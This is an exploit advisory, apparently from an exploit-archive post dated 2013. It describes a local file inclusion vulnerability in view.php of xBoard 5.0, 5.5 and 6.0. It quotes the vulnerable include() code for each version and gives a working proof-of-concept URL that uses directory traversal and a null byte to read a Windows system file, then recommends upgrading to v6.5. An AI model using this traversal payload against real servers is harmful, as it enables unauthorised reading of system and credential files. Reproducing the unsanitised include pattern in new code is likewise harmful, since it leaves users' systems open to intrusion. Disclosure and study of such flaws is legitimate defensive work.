xBoard versions 5.0, 5.5, and 6.0 suffer from a local file inclusion vulnerability.
ea65a2314d43263c2ca2e1369ceedc90166a109931b14ab99de74043e36f9ae7
X-------------------------------------------------------------X
_____ _ _ _ _ _____ _____ _____ ___ _ _ _______ _______ ___________
|_ _| | | | \ | |_ _/ ___|_ _|/ _ \ | \ | | / __ \ \ / / ___ \ ___| ___ \
| | | | | | \| | | | \ `--. | | / /_\ \| \| | | / \/\ V /| |_/ / |__ | |_/ /
| | | | | | . ` | | | `--. \ | | | _ || . ` | | | \ / | ___ \ __|| /
| | | |_| | |\ |_| |_/\__/ /_| |_| | | || |\ | | \__/\ | | | |_/ / |___| |\ \
\_/ \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/ \____/ \_/ \____/\____/\_| \_|
X-------------------------------------------------------------X
[+] Author: TUNISIAN CYBER
[+] Exploit Title: xBoard 5.0/5.5/6.0 Local File Inclusion
[+] Date: 24-12-2013
[+] Category: WebApp
[+] Vendor:http://sourceforge.net/projects/xboard/
[+] Google Dork:
[+] Tested on: Win7 , ubuntu 13.04
########################################################################################
I/Vulnerable code: view.php
v5.0:
49: if (file_exists("$directory/$post.html"))
50: {
51: include("$directory/$post.html");
v5.5:
28: if (file_exists("$directory/$post.html"))
29: {
30: include("$directory/$post.html");
v6.0:
27: if (file_exists("$directory/$post.html"))
28: {
29: include("$directory/$post.html");
II/Exploit and p.0.c:
http://{host}/xboard/view.php?post=../../../../../../../../../../windows/win.ini%00
p.0.c: http://oi44.tinypic.com/2uxyaz9.jpg
III/Solution:
Upgrade to v6.5
./3nD
########################################################################################
Greets to: XMaXtn, N43il HacK3r, XtechSEt